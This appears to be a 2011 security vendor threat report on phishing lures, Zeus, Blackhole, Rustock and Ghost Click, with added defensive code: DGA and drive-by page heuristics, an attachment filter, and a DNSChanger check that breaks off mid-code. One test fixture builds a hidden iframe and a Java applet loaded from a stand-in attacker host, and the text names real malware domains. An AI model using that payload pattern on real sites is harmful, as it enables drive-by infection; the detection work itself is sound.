VNR: 2011 Overview

Table of Contents

1. Overview

2. World Events

a.    Introduction
b.    The Earthquakes in Japan and New Zealand
c.    Bin Laden's Death
d.    Gaddafi

3. Worldwide Web of Botnets

a.    Rustock Dismantled
b.    Zeus
c.    A Challenger Appears-The Blackhole Toolkit
d.    Weyland-Yutani

4. Cybercrime and You

a.    Cost of personal Data Declines
b.    First Data
c.    IRS Tax Delays Help Time Malware
d.    Nacha and the Automated Clearing House
e.    Facebook Survey Scams
f.    Operation: Ghostclick

5. It's Not All About the Money

a.    Introduction
b.    Diginator
c.    Malware on a Mission
d.    Hacktivism

6. Total Email Traffic

7. Tests Failed

8. Regions of Origin

9. Top Ten Countries of Origin

10. Top Threats of 2011

11. Virus Traffic

12. Image Spam


1. Overview

2011 brought a great deal of varied activity to the realm of cyber security. World events steered several large malware campaigns: Japan and New Zealand suffered major tragedies that left the rest of the world hungry for any and all information about those regions, and that appetite for news led some victims straight into malicious online traps.

Rustock, one of the largest botnets of the past several years, was silenced and dismantled, while Zeus and a few other malware families carried on as strong as ever. What became clear this past year is that malware can be, and is being, used for purposes far more nefarious than emptying bank accounts. Stuxnet, first discovered in 2010, was picked apart in depth over the course of the year, and with it came the realization that cyber warfare is more than just an idea. Earlier evidence had suggested that this use of cyber-attacks was in its infancy or just over the horizon; as Stuxnet was analyzed and its intentions understood, it became clear that cyber warfare has officially arrived.

This report is designed to highlight some of the major stories and events that occurred during the year 2011, as well as give actual metrics of these events as seen by AppRiver filters.

2. World Events

World events have long been a dependable lure for cybercrime. The moment a tragedy draws the attention of a large portion of society, those with malicious intent begin capitalizing on it, feeding the Internet their own versions of the news complete with information- and money-stealing malware. Their favorite vectors for this kind of attack are SEO poisoning and large malicious email blasts.

2b. The Earthquakes in Japan and New Zealand

Japan was hit hard in March 2011 by a massive earthquake that spawned a devastating tsunami and tragically took many lives. Japan is still dealing with damage to the Fukushima Daiichi nuclear power plant, where overheated spent fuel rods have caused radiation leakage. Cyber criminals decided these events were a perfect opportunity to take advantage of people's concern. Emails began circulating mid-month, claiming to come from the British Red Cross and attempting to collect money from people whose only intention was to help the victims. This mirrored exactly what had followed the earthquake in New Zealand barely two weeks beforehand: a number of fake charity sites popped up, most notably sites that mimicked the Red Cross in an attempt to lend legitimacy to the scam. These fake Red Cross sites posed as the New Zealand Red Cross in the case of the Christchurch tragedy, and as the UK Red Cross or Japanese Red Crescent in the wake of the disasters in Japan. Unfortunately, anyone who donated became a victim themselves. The emails gave brief news tidbits about the catastrophes and claimed that "The Japanese Red Cross has agreed to accept donations from the UK". They also offered a way to "donate" via a Moneybookers account. Moneybookers is a payment intermediary similar to PayPal: anyone can pay money into an account, and the account holder can withdraw it nearly anonymously and with little trace. The emails listed a Yahoo email address as the contact for donations. That alone should have been a big red flag to anyone paying attention: a legitimate charity would use an email address at its own domain and would steer donors to its own site over an HTTPS connection for any donation, assuming it spammed out requests for donations in the first place, which it would not. Keep a level head and research any and all charities before handing over your money.

Other scams that quickly followed claimed to have actual video of the tsunami in Japan and arrived in several email formats: sloppy plain-text emails containing supposed links to the videos, emails designed to look like Twitter notifications, and emails pretending to be notifications from CNN. Unlike the fake charity pages, where victims unknowingly handed their money directly to the scammers, these video-themed attacks placed malware on victims' PCs, giving the attackers direct access to whatever they wanted, from account information and credentials to enrolling the machine in a remotely controlled botnet.

We have seen samples of the "breaking news" CNN-formatted email before and observed the technique to be quite effective on a large scale. Most notably, from August 2008 through late 2009 it was a very popular theme, often associated with the Storm Worm, used to trick recipients into believing they were receiving legitimate news notifications. The subjects ranged from the ridiculous ("Olympic Athletes Bare All") to the political ("McCain Lawyers Impeach Obama") to the then current in pop culture ("Listen Online Now", which led viewers to a supposed sneak peek at a newly released Michael Jackson song shortly after his death).

2c. Bin Laden's Death

Immediately following the news of Osama Bin Laden's death, Bin Laden-themed scams and malware began circulating on the Web. As usual after a large news event, scammers rode the coattails of the news with fake stories of their own, hoping to lure in click-happy, news-hungry victims. The first place we saw messages appear was Facebook. It began as a Wall post from a friend claiming to link to video footage of the raid. After clicking the link, the recipient was instructed to jump through several hoops, including filling out a fake survey and copying and pasting JavaScript into their browser (the so-called self-XSS trick). If that last step doesn't sound like a completely terrible thing to do, know from now on that it is: script pasted into the browser runs with the full privileges of the logged-in Facebook session, exactly as if the user had performed the actions themselves.

The code would make the victim's Facebook account "Like" the malicious page and silently post copies of the link to all of their friends, perpetuating the spread. At the end of the survey, participants were asked to enter their cell phone numbers to receive their results. The fine print stated that this would result in a $10 charge on the cell phone bill. It's not clear whether this was a one-time charge or one that would quietly recur.

Along with this Facebook scam, we also saw Bin Laden-themed emails aimed at inboxes. The first run we saw was in Portuguese and translated to: "After the announcement of the death of Osama Bin Laden, several pictures of the body were released on the internet. According to American newspapers, not all of them are real." The email carried an attachment, "FOTOS.Terroris.zip", that supposedly contained the photos. The file was of course not photos but a banking Trojan designed to steal bank account credentials and, eventually, the victims' money.

2d. Gaddafi

2011 witnessed uprisings against governments in Egypt, Syria, and Iran, to name a few. But perhaps the most notable news came from Libya, where Muammar Gaddafi's 42-year rule over the Libyan people ended with his swift overthrow and, in October, his death. Early in the events we began seeing a large amount of unwanted email using the subject matter to entice recipients to open spam. Subject lines read "VIDEO: Rebels target Gaddafi's home town", "VIDEO: Inside Gaddafi's ransacked compound," and "Gaddafi 'still threat' for Libya," while the contents ranged from run-of-the-mill Viagra ads to Libyan revolution-themed 419 scams.

After a final standoff in Sirte on October 20th, Libya's former leader was captured and killed. The underground saw this as another opportunity to deliver malware. Not only did we see emails pretending to come from fake news sources, but also a few that purported to come from Gaddafi's sons. One in particular supposedly contained a .wmv clip of Gaddafi immediately following his capture. The email was written in Portuguese, much like the Bin Laden malware earlier in the year, and read "VEJA OS VIDEOS DO CORPO DE MUAMMAR GADDAFI, APÓS SER CAPTURADO PELOS REBELDES", which translates to "See the videos of the body of Muammar Gaddafi, after being captured by the rebels". The attachment appeared to be a Windows Media file but was instead a standalone executable named "fotosweb.scr" (a .scr screensaver file is an ordinary Windows executable under another extension). Once executed, the malware added itself to the registry's Run key so that it would start every time the computer rebooted, then hid itself in the file system. It then made an ordinary HTTP request over port 80 to a Dropbox-hosted URL, which was down at the time of testing, so we were unable to verify what further malware it intended to pull down.

3. Worldwide Web of Botnets

3a. Rustock Dismantled

The Rustock botnet had been making headlines for several years, famous for being the largest spam-producing botnet in existence (AppRiver would typically see an average of 50 million pieces of spam from Rustock bots on a daily basis). But in December 2010, Rustock drew the attention of security professionals by going on hiatus. There seemed to be no rhyme or reason for its departure as Rustock's Christmas-themed email traffic came to a halt. It was theorized that the group operating the botnet was performing maintenance or relocating its command and control servers, though it isn't common for a botnet to shut down completely while such tasks are performed, as it is essentially unnecessary. Perhaps the Rustock crew had begun to feel some heat from the investigations that we now know were taking place at the time and pulled the plug. If so, they must have decided the coast was clear, because just a few weeks later Rustock powered back up as if nothing had happened.

Operations continued from January until March 16th, when Microsoft, armed with its own research and critical research from FireEye and the Dutch High Tech Crime Unit, led a coordinated action with the help of the U.S. Marshals against seven U.S.-based hosting providers that housed Rustock's command and control servers. These C&C machines were located in Kansas City, Denver, Seattle, Chicago, Dallas, Scranton, and Columbus, Ohio. Microsoft carried a court order granting it the right to seize any and all machines linked to Rustock. The effects were noticed almost immediately as the millions of Rustock-infected bots stopped receiving orders and fell silent. Spam volumes dropped nearly 35% as measured by our filters. The operation appears to have been very effective, as we haven't heard a peep from Rustock since, and it may yield more results in the near future as Microsoft pores through the newly collected data in an effort to identify the people behind the botnet. To date no one has been charged in connection with Rustock.

3b. Zeus

Even though the author of the Zeus banking Trojan/toolkit announced back in January that he had handed his code for the now ubiquitous Trojan to the author of the then rival SpyEye, we are still seeing plenty of campaigns that match Zeus' footprint. These likely come from Zeus kits that remained in the wild after the supposed underground code merger. We've seen all sorts of themes over the past year, including the tried and true fake delivery receipts supposedly from companies such as DHL, FedEx and UPS. The attachments in these emails almost always contained one of a few popular Trojan downloaders, known under various AV vendor names as Pushdo, Kryptik, Delphi, Bredo, Sasfis, or Oficla (several of these names refer to the same family). The downloaders then fetched either scareware posing as antivirus or a banking Trojan such as Zeus or, more recently, SpyEye.

Back in May we saw a ploy by Zeus operators to trick people into believing the attachment was a security update from Microsoft, and then a pair of back-to-back campaigns in July pretending to be messages from the National Security Association and from the Board of Governors of the Federal Reserve System. Both urged recipients to install fake system security updates. Instead of stronger security, victims received yet another variant of the Zeus Trojan.

Another very popular ploy used by Zeus this past year has been to imitate NACHA, the organization that sets the rules for the Automated Clearing House network used for electronic transactions such as insurance premiums and mortgage payments.

Most recently, we have been seeing Zeus pretending to be the Chamber of Commerce. The campaign used a stolen banner complete with the Chamber's logo, as well as a footer giving the Chamber's address and other details. The somewhat cryptic message suggested that the reader might have a good, mutually beneficial professional partnership in store for their business, with all of the pertinent information supplied in the attachment "USChamber[dot]zip".

The attachment was of course a rather aggressive piece of malware that opened a backdoor on the victim's system in order to download further malicious payloads once it was established. Once it had a foothold, it attempted to contact two domains, jokeins[dot]com and agrofond[dot]com, and from each it made an HTTP GET request for a file named start[dot]exe. This file was the ever-popular Zeus. Once Zeus ran, it spawned a process named miuf[dot]exe, which in turn launched a keylogger and then began trying many outbound connections in classic Zeus style: every couple of seconds it tried a different pseudo-random domain name on port 80 until it found one that was live and could hand it instructions. These are domains such as gzdyhtiyhxbve21d10mvdrjtbzftpucyjq[dot]org, produced by an algorithm shared between the bot and its controller rather than chosen by hand, which is why blocking any single domain does little to disrupt the botnet.

Zeus also sent a handful of UDP packets, each carrying 72 bytes of data, to an equal number of unique IP addresses. They originated from random local ports, with the destination port differing per recipient IP address. This was possibly the bot announcing itself to other members of the botnet the victim had just joined.
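The pseudo-random domain names above (and qimqzrtpkmukd[dot]com in the NACHA section later in this report) can be spotted in resolver logs without knowing the generation algorithm. The Python below is an added example, not code from AppRiver or from the Zeus kit: it scores each queried name on a few "looks machine-generated" signals and returns the ones that trip the heuristic. The log lines are constructed for the example, and the thresholds are assumptions tuned only against these samples; expect false positives on CDN and tracking hostnames, and treat the output as a triage list rather than a verdict.

```python
import math
from collections import Counter

VOWELS = set("aeiou")

# Constructed sample of resolver log lines: timestamp, client, query type, name.
SAMPLE_LOG = """\
2011-11-02 14:03:11 10.0.0.12 A www.google.com
2011-11-02 14:03:12 10.0.0.12 A jokeins.com
2011-11-02 14:03:12 10.0.0.12 A agrofond.com
2011-11-02 14:03:15 10.0.0.12 A gzdyhtiyhxbve21d10mvdrjtbzftpucyjq.org
2011-11-02 14:03:17 10.0.0.12 A qimqzrtpkmukd.com
2011-11-02 14:03:18 10.0.0.12 A appriver.com
"""


def shannon_entropy(s):
    """Bits per character; machine-generated labels use their alphabet nearly uniformly."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def longest_consonant_run(label):
    run = best = 0
    for ch in label:
        if ch.isalpha() and ch not in VOWELS:
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def second_level_label(domain):
    """Label directly left of the TLD. Naive: does not understand suffixes like co.uk."""
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def dga_score(domain):
    """Number of independent 'looks generated' signals that fire, 0..5 (thresholds assumed)."""
    label = second_level_label(domain)
    letters = [c for c in label if c.isalpha()]
    vowel_ratio = sum(c in VOWELS for c in letters) / max(len(letters), 1)
    signals = [
        len(label) >= 12,                                   # unusually long label
        vowel_ratio < 0.25,                                 # unpronounceable
        longest_consonant_run(label) >= 5,                  # long consonant cluster
        shannon_entropy(label) >= 3.5,                      # near-uniform character mix
        any(c.isdigit() for c in label) and bool(letters),  # letters and digits mixed
    ]
    return sum(signals)


def is_dga_like(domain, threshold=3):
    return dga_score(domain) >= threshold


def suspicious_domains(log_text):
    """Distinct queried names that trip the heuristic, in the order first seen."""
    seen = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        name = fields[-1]
        if is_dga_like(name) and name not in seen:
            seen.append(name)
    return seen


if __name__ == "__main__":
    for d in suspicious_domains(SAMPLE_LOG):
        print(f"{dga_score(d)}/5  {d}")
```

The two Zeus names score 5/5 and 3/5 respectively while the ordinary names score 0, so the threshold of 3 separates them here; on real traffic, pair a hit with the other behaviour described above (a burst of lookups every few seconds, most of them failing) before acting on it.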

3c. A Challenger Appears - The Blackhole Toolkit

It has become a very familiar sight: emails with malicious attachments pretending to be from popular shipping companies, fake IRS notifications, or similar ploys. Most of these are courtesy of the Zeus Trojan, an easily recognizable kit-built Trojan hell-bent on stealing banking information from unsuspecting victims. Zeus has been around for quite some time now, and because it is easy to obtain on the underground forums, it has spread rapidly in the wild.

Lately, though, a lesser-known exploit kit by the name of Blackhole has gained in popularity. Blackhole was released onto the underground market less than a year ago and was sold for around $1,500 US per yearly license, support included. The price was enough to keep the rookies away and allowed operators of the new kit to stay relatively under the radar, until May of this past year, when a copy was made available for free in many locations. Since then we have seen a steady increase in the number of infections for which this kit is responsible.

Initially, Blackhole's operators compromised legitimate websites and used them as traffic sources: visitors were silently redirected to a Blackhole landing page and infected via drive-by download. An email component has since been added to drive traffic to these pages, and the sites involved are no longer only compromised legitimate ones but primarily a slew of throwaway domains set up for the sole purpose of snaring victims. Early in October, after the passing of Steve Jobs, we began to see emails claiming, under a few different subject lines, that Apple's co-founder was in fact still alive. The emails contained a link to the "Hot News". Readers who clicked the link were led to one of thousands of web pages serving the Blackhole kit. The landing page ran an obfuscated JavaScript that fingerprinted the visitor's browser and plugins looking for known vulnerabilities, exploited whichever it found, and installed a backdoor on the system.

More recently we began seeing a new campaign linked to the Blackhole kit, with a fresh batch of associated domains. These emails were made to look like an automated notification from a Hewlett-Packard OfficeJet printer, claiming that a document had been scanned and sent to the recipient and helpfully offering links from which to view it. The links did what anyone would now expect and shipped the unfortunate reader off to more Blackhole landing pages. This time the pages also included an element that attempted to load a Java applet in addition to the usual attack, again hidden in more obfuscated JavaScript. At the time, we saw well over 1,500 domains serving up Blackhole-generated malware, and over 4.5 million emails related to this campaign hitting our filters at a rate of 30,000 per minute. There have been several newer campaigns since, which suggests that Blackhole will be around for a while.
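An analyst who pulls down one of these landing pages usually wants a quick answer to "is this a kit page?" before spending time on the obfuscated script. The following Python is an added example, not code from AppRiver or from the Blackhole kit: it decodes the common String.fromCharCode(...) trick, then counts drive-by indicators (hidden iframes, Java applet loading, eval/unescape, encoded strings, heap-spray blobs) over both the raw page and the decoded strings. The sample page, its hostnames and its file names are constructed for the example; the indicator list and the three-indicator threshold are assumptions, so a hit means "look closer", not "confirmed exploit".

```python
import re

# Constructed sample: an iframe hidden behind String.fromCharCode, an eval(unescape(...))
# stub, and an applet tag that pulls a .jar. All hostnames and file names are made up.
IFRAME_SRC = ('<iframe src="http://bad.example/main.php" width="1" height="1" '
              'style="visibility:hidden"></iframe>')
MALICIOUS_HTML = (
    "<html><body>\n"
    "<script>\n"
    "var k = String.fromCharCode(" + ",".join(str(ord(c)) for c in IFRAME_SRC) + ");\n"
    "document.write(k);\n"
    "eval(unescape('%64%6f%63%75%6d%65%6e%74'));\n"
    "</script>\n"
    '<applet code="Exp.class" archive="http://bad.example/exp.jar" width="1" height="1"></applet>\n'
    "</body></html>\n"
)
BENIGN_HTML = ("<html><body><h1>Scan from HP OfficeJet</h1>"
               "<p>Your document is attached.</p></body></html>\n")

# Each indicator is a heuristic; none of them alone proves anything.
INDICATORS = {
    "hidden_iframe": re.compile(
        r'<iframe\b[^>]*?(?:(?:width|height)=["\']?[01]["\']?(?=[\s/>])'
        r'|display:\s*none|visibility:\s*hidden)[^>]*>', re.I),
    "java_applet": re.compile(r"<applet\b|application/x-java-applet|\.jar\b", re.I),
    "dynamic_eval": re.compile(r"\beval\s*\(|\bunescape\s*\(|document\.write\s*\(", re.I),
    "charcode_string": re.compile(r"String\.fromCharCode\s*\(", re.I),
    "heap_spray_blob": re.compile(r"(?:%u[0-9a-f]{4}){16,}", re.I),
}


def decode_fromcharcode(html):
    """Decode every String.fromCharCode(1,2,3) call whose arguments are literal integers."""
    out = []
    for m in re.finditer(r"String\.fromCharCode\s*\(([\d,\s]+)\)", html):
        codes = [int(x) for x in m.group(1).split(",") if x.strip()]
        out.append("".join(chr(c) for c in codes))
    return out


def triage(html):
    """Map indicator name -> hit count, searching the raw page plus any decoded strings."""
    views = [html] + decode_fromcharcode(html)
    hits = {}
    for name, rx in INDICATORS.items():
        n = sum(len(rx.findall(view)) for view in views)
        if n:
            hits[name] = n
    return hits


def is_suspicious(html, min_indicators=3):
    """Assumed threshold: three distinct indicator families firing on one page."""
    return len(triage(html)) >= min_indicators


if __name__ == "__main__":
    print(triage(MALICIOUS_HTML), is_suspicious(MALICIOUS_HTML))
    print(triage(BENIGN_HTML), is_suspicious(BENIGN_HTML))
```

The hidden iframe is invisible to a plain regex over the page source because it exists only as a list of character codes; decoding first is what lets the check see it. Real kit pages layer several encodings, so in practice this is the first pass before running the script in an instrumented browser.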

3d. Weyland-Yutani

The month of May brought a new equal-opportunity malware kit, now being offered on the underground forums. It goes by the name Weyland-Yutani Bot, after the fictional company in the movie Aliens. Weyland-Yutani has a very interesting built-in feature: the ability to automatically generate payloads designed to infect both PC and Mac machines. Mac malware has been around for a while, but until now it had not been available as a kit. Kits are written so that the buyer adds a couple of customizations, hits "Go", and gets custom malware, which puts them within reach of even the minimally technical. The kit was selling for 1,000 WebMoney credits, roughly $1,065 US, and the authors promised iPad and Linux support in the very near future. Imagine a user browsing past an infected site and becoming a victim regardless of operating system. To best avoid this, internet users should keep all of their software up to date, especially the OS and the browser, as these are often the first targets. Don't discount the rest of your software either: remove anything unnecessary, and use multiple layers of security including antivirus and a firewall. Safe browsing habits don't hurt either.

4. Cybercrime and You

4a. Cost of Personal Data Declines

In the very beginning, computer viruses were written mainly to prank one's adversaries or peers across shoddy, low-baud telephone connections. In the days of the BBS, or Bulletin Board System, users would dial in to servers housed in spare bedrooms and basements. The popular ones would pay to have several extra phone lines run into the house so multiple people could connect at once. On these places of wonderment and ASCII art, small communities played text-based games and shared files and ideas. It wasn't long, however, before people grew brave behind the keyboard and started taunting one another. Short scripts were written to boot other users off the board by breaking their connections, and keyboards were remapped so that "Y" became "N" and vice versa; when prompted with "You are about to format your C: drive, proceed?", the unsuspecting victim would unknowingly answer "Yes" by pressing the "N" key for "No".

Things have changed drastically since those days, which in actuality weren't that long ago. Nowadays, malware is about collecting personal information and, ultimately, victims' money. Its operators no longer want targets to know of their existence; they prefer to remain hidden so no one is the wiser as they siphon off data and use the infected machine to do their bidding. The whole underground economy runs much like the legal business world it operates alongside. Different people play different roles and have different specialties in the cybercrime game. The storefront of the underground economy, or Dark Market as it has also been called, is the basic online forum or IRC channel. These pop up and shut down all the time, sometimes simply moving from place to place in order to stay out of sight. On these forums people buy, sell and trade items of malicious intent. This is also where someone interested in, say, fencing stolen electronics would come to purchase sets of credit card numbers with which to make purchases using someone else's money. These sets usually come with a guarantee that the accounts are still active, and are priced by the country the accounts reside in and how much money is in them. Sets that also include the cardholder's name, address, date of birth, and Social Security Number (where applicable) are referred to as "Fulls": every piece of information a criminal needs to easily make an online purchase under someone else's identity.

Just one year ago the price of these "Fulls" was around $10-$12 each for an active US-based identity. Today the same "Fulls" go for as low as $2 each, with an average of around $6-$7. The forums that sell them also tend to stock tens of thousands at any given time. This is a bad sign for the innocent. The rapid drop in price isn't caused by a lack of demand; it's due to the market being flooded with stolen personal data. With the proliferation of data-stealing kits such as Zeus and SpyEye, and of exploit kits such as Blackhole that deliver them, it is getting ever easier for even the most novice cyber thief to break into your bank account.

4b. First Data

People who use malware to steal personal information go about it in many different ways, and sometimes they get creative. On the 25th of January we saw a rather alarming technique for stealing money without going through the cardholder at all. These attacks were aimed at merchants, in particular those who use the merchant services company First Data. First Data is one of many companies that provide credit card processing for merchants, the go-between linking the restaurant server or retail clerk with your actual credit card issuer. According to First Data's website, they provide merchant services to more than 6 million locations, thousands of card issuers, and millions of customers worldwide. The January scam began with an email carrying an .html attachment: essentially a phishing page attached to the message rather than the usual link to a remotely hosted one, which sidesteps filters that judge a message by the links it contains. After opening the page, the merchant is asked to provide some key information: store number, user ID, tax ID, and password. That is all the information needed to gain access to the merchant's account, and with it the attacker would likely gain control over that specific merchant's First Data account. It was unclear whether this breach would have exposed any of the merchant's customer records, but it is a distinct risk, making this an attack with a much broader potential impact.

4c. IRS Tax Delays Help Time Malware

Cybercriminals are always eager to exploit any angle that serves their interests and helps them spread their malware to as many computers as possible. On February 15th, 2011, we began seeing a malware campaign that was at the very least well timed and fairly well crafted. The messages claimed "Your Federal Tax Payment has been Rejected", and the accompanying attachment was yet another Zeus offering. Messages claiming to come from the IRS are nothing new, but this was perhaps the most uniquely well-timed attack we have seen. Because the U.S. government waited until the last minute to extend tax cuts at the end of 2010, the IRS was unable to accept millions of tax returns until February 14th. Every individual claiming certain deductions and using tax software to e-file would have had their return held by the tax preparation company (TurboTax, TaxAct, H&R Block, etc.) until February 14th and then sent automatically, once the IRS was ready to accept it. Most of these individuals would have received an email as their return was submitted stating that it had been "sent" to the IRS, and that they would receive another confirmation once it had been "accepted". In other words, millions of Americans were expecting to hear by email within the following 48 hours whether their return had been accepted or rejected, so this attack could hardly have been better timed. Of course, the legitimate email would have come from the tax preparation company used to file, not from the IRS directly. The IRS does not ask for personal identifying or financial information via unsolicited email.

4d. Nacha and the Automated Clearing House

NACHA seemed like an interesting target when we first saw it used in Zeus malware campaigns early in August, but rather than a one-time shot in the dark, the theme was used again and again through the last quarter of 2011. During the last week of August, the second time we saw NACHA used, we saw nearly 3 million pieces in about 12 hours. NACHA is a non-profit group that sets the rules for electronic transactions such as insurance premiums and mortgage payments, and is, as its site says, "the backbone for the electronic movement of money and data." The second run that month used emails that were a little less decorated than the earlier ones, but the basic ploy was the same: a claim that a payment transaction had been cancelled, which can be a very big deal if it is someone's mortgage payment trying to traverse the wires. Something like that could certainly cause panic in a time of recession and foreclosure. These messages were certainly fakes, but the threat was cause for alarm.

The attachment, "report_082011&-65.pdf.exe", was a busy one once executed. (Note the double extension: with Windows' default setting of hiding known file extensions, the file shows up as "report_082011&-65.pdf".) It began by checking whether it was running under a debugger, a self-defense mechanism used to avoid analysis by those pesky AV people. It then injected itself into running processes and deleted its original file, seemingly disappearing into the ether. Unfortunately it had not. It was a downloader that brought its friend Zeus to the party. It did so by spawning several processes, one of which first reached out to a Google IP to check for network connectivity and then to a pseudo-random domain name, in this case qimqzrtpkmukd[dot]com, in order to reach its command and control server. Once the connection was made, the victim machine was infected with Zeus, became part of a botnet, and the controller could push down further malware and tap off information at will. Stay away from unwanted emails from unknown senders, and always question alerts claiming that packages couldn't be delivered, transactions have failed, or your password needs to be changed, or anything else that requires you to open an attachment or enter personal information in order to proceed.
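Every lure in this report arrives as an executable wearing a document's clothing: "fotosweb.scr" posing as a video, "report_082011&-65.pdf.exe" posing as a PDF, and "USChamber.zip" or "FOTOS.Terroris.zip" hiding an .exe inside an archive. The Python below is an added example of the attachment policy a mail gateway can apply to names like these; it is not AppRiver's filter code. It flags executable extensions, the double-extension trick, and executables nested in a zip, which it inspects in memory. The extension lists are assumptions (extend them for your environment), and the zip contents are constructed here with dummy bytes; the real malware is not reproduced.

```python
import io
import posixpath
import zipfile

# Assumed policy lists. Windows treats every one of these as directly runnable.
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "vbs", "vbe", "js", "jse",
                   "wsf", "wsh", "hta", "cpl", "msi", "jar", "reg", "lnk", "dll"}
# Extensions a lure borrows to look harmless ("fotosweb.wmv", "report.pdf").
LURE_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png", "gif",
             "wmv", "avi", "mp4", "txt", "htm", "html"}
ARCHIVE_EXTS = {"zip"}


def split_exts(filename):
    """('report_082011&-65', ['pdf', 'exe']) for 'report_082011&-65.pdf.exe'."""
    base = posixpath.basename(filename.replace("\\", "/")).lower()
    parts = base.split(".")
    return parts[0], parts[1:]


def classify_name(filename):
    """Reasons to block based on the name alone; empty list means the name looks fine."""
    _, exts = split_exts(filename)
    reasons = []
    if not exts:
        return reasons
    final = exts[-1]
    if final in EXECUTABLE_EXTS:
        reasons.append(f"executable extension .{final}")
        if len(exts) > 1 and exts[-2] in LURE_EXTS:
            # Explorer hides the last extension by default, so the user sees only ".pdf".
            reasons.append(f"double extension .{exts[-2]}.{final} "
                           "(Windows hides the final extension by default)")
    return reasons


def classify_attachment(filename, data=None):
    """Name check plus, for zip archives, the same check on every member name."""
    reasons = classify_name(filename)
    _, exts = split_exts(filename)
    if exts and exts[-1] in ARCHIVE_EXTS and data is not None:
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for member in zf.namelist():
                    for r in classify_name(member):
                        reasons.append(f"archive member {member}: {r}")
        except zipfile.BadZipFile:
            # Corrupt or non-zip content under a .zip name is itself worth blocking.
            reasons.append("archive is not a valid zip")
    return reasons


def build_zip(members):
    """Build an in-memory zip from {name: bytes}; used only to construct test input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed stand-ins for the lures named in this report (dummy contents).
    lure_zip = build_zip({"FOTOS.Terroris/fotos.exe": b"MZ\x90\x00"})
    for name, data in [("fotosweb.scr", None),
                       ("report_082011&-65.pdf.exe", None),
                       ("FOTOS.Terroris.zip", lure_zip),
                       ("invoice.pdf", None)]:
        print(name, "->", classify_attachment(name, data) or "allow")
```

The policy deliberately ignores what the file claims to be (a .scr is run as a program whatever icon it carries) and does not try to peek inside nested archives or password-protected zips; those cases should simply be quarantined for a human.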

4e. Facebook Survey Scams

We're all becoming more familiar with Facebook scams and malware: a post from a friend touting a strange, sexy, or news-oriented video with a comment that leaves just enough to the imagination to entice people into clicking the link. The most popular line of attack at the moment is the survey scam, and we certainly saw a lot of them this past year. These taunt viewers with one of the aforementioned videos and instead lead them through a survey that must be completed before they get to what they want. At the end of a usually short line of questioning the reader is tricked into receiving the answer by text. By agreeing, they are signed up for a premium "service" that charges $2 per text message and keeps sending them on a regular basis.

Often the subject of these videos is just something odd or vague, such as one that claimed to show a girl with a spider living under her skin. Others go the route of "You've got to see this!" or "I can't believe what you were doing in this video". More and more, these scams also use the old tried-and-true tactic of riding current events in order to spread faster, as with the aforementioned video of Osama Bin Laden's death. We also saw scammers preying on people trying to learn about the bombings in Oslo back in July; that one started appearing just hours after the event in Norway. Equally punctual were the ones that appeared immediately after the announcement of Amy Winehouse's death, claiming to be video of her smoking crack just before she died. These show no sign of stopping and can catch a person off guard. Stay aware, and question links that seem a little off to avoid these scams.

4f. Operation: Ghostclick

On Wednesday November 9th, 2011, we can chalk up another one for the good guys in the cyber crime realm. On this day, the FBI officially announced that a group of 6 Estonians had been arrested and charged with a cyber scheme that had begun in 2007 and netted the criminals more than $14 million. The campaign had been dubbed "Operation:GhostClick"

The group managed to set up several Publisher Networks which can be, though not in this case, legitimate third party companies that web site owners hire to fill their ad space while they worry about their own content. Advertisers will approach these companies to help sell their ads to web sites. These third party companies then often band together and form networks through which they share ads between themselves and their specific clientele. When an ad is clicked, everyone down the line gets their fair share. Unfortunately for legitimate advertisers, this group was not collecting their fair share, but instead generating millions of unique clicks from stolen sources.

The fraud ring used a combination of two techniques to accomplish their goals. One was Click-jacking, and the other, Advertising Replacement Fraud. First, Click-jacking occurs when someone browsing a website intends on clicking on a link or an ad that they're interested in, but when they do they are instead re-routed to a different website. For example, in this case, one of the ads offered up to browsers was a link to the official iTunes Store (a hover over with the mouse would show the legitimate site as well); however when users clicked on the link, it would then take them to false Apple sites instead. At this point the "click" would be counted towards the fake site where the users ended up, and therefore generated money to the fraud ring.

Advertisement replacement fraud occurs when legitimate ads on legitimate sites are replaced with ads the criminals want displayed instead. The group used this to place its fraudulent ads on popular, high-volume websites, where the odds of click-throughs are far higher. For example, the ad for the American Express "Plum Card" on the home page of the Wall Street Journal was replaced with an ad for "Fashion Girl LA". Clicks on these links also generated cash for the bad guys.

The group accomplished all of this by infecting victims' computers with malware designed to alter their DNS settings. The Domain Name System is essentially the telephone book of the Internet. A computer does not inherently know how to reach www.google.com; when a user types that name into a browser, the computer asks the DNS server configured in its network settings and learns that the name currently resolves to a particular IP address (or one of several). From there it can direct the browser to the right place. The criminals pointed their victims' computers at rogue DNS servers that answered with the wrong IP addresses for legitimate names, sending the victims through the fraudsters' fake sites, which in turn generated advertising-click revenue for them, instead of to the destinations the victims had actually intended.

The FBI estimated that more than 4 million computers in 100 countries were infected by this group, at least 500,000 of them in the US alone. The FBI also published a document explaining how to tell whether a machine's DNS settings have been altered.

If they have been altered, though, simply changing them back is not enough, because the malware that changed them will most likely still be on the machine. The malware blocked the installation of new anti-virus and operating system updates on its host in order to keep itself running. The best course for victims is to make sure their local anti-virus is up to date and then run a full scan and clean. It is also worth running a third-party web-based anti-virus scan, making sure the proper DNS settings are in place at the time so that the scanner itself is not being redirected.
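To make that check concrete, here is an added example (written for this page; it is not the FBI's document or AppRiver's code). It reads resolver addresses out of either a Unix /etc/resolv.conf or the "DNS Servers" block of Windows "ipconfig /all" output and flags any that fall inside the six rogue resolver ranges the FBI published for this case; those ranges are the only real data in it, while the parsing helpers, the function names and the sample configuration text are constructed for the example.

```go
package main

import (
	"bufio"
	"fmt"
	"net"
	"regexp"
	"strings"
)

// RogueCIDRs are the six rogue resolver ranges the FBI published for the
// Ghost Click / DNSChanger case, converted to CIDR notation.
var RogueCIDRs = []string{
	"85.255.112.0/20", // 85.255.112.0 - 85.255.127.255
	"67.210.0.0/20",   // 67.210.0.0 - 67.210.15.255
	"93.188.160.0/21", // 93.188.160.0 - 93.188.167.255
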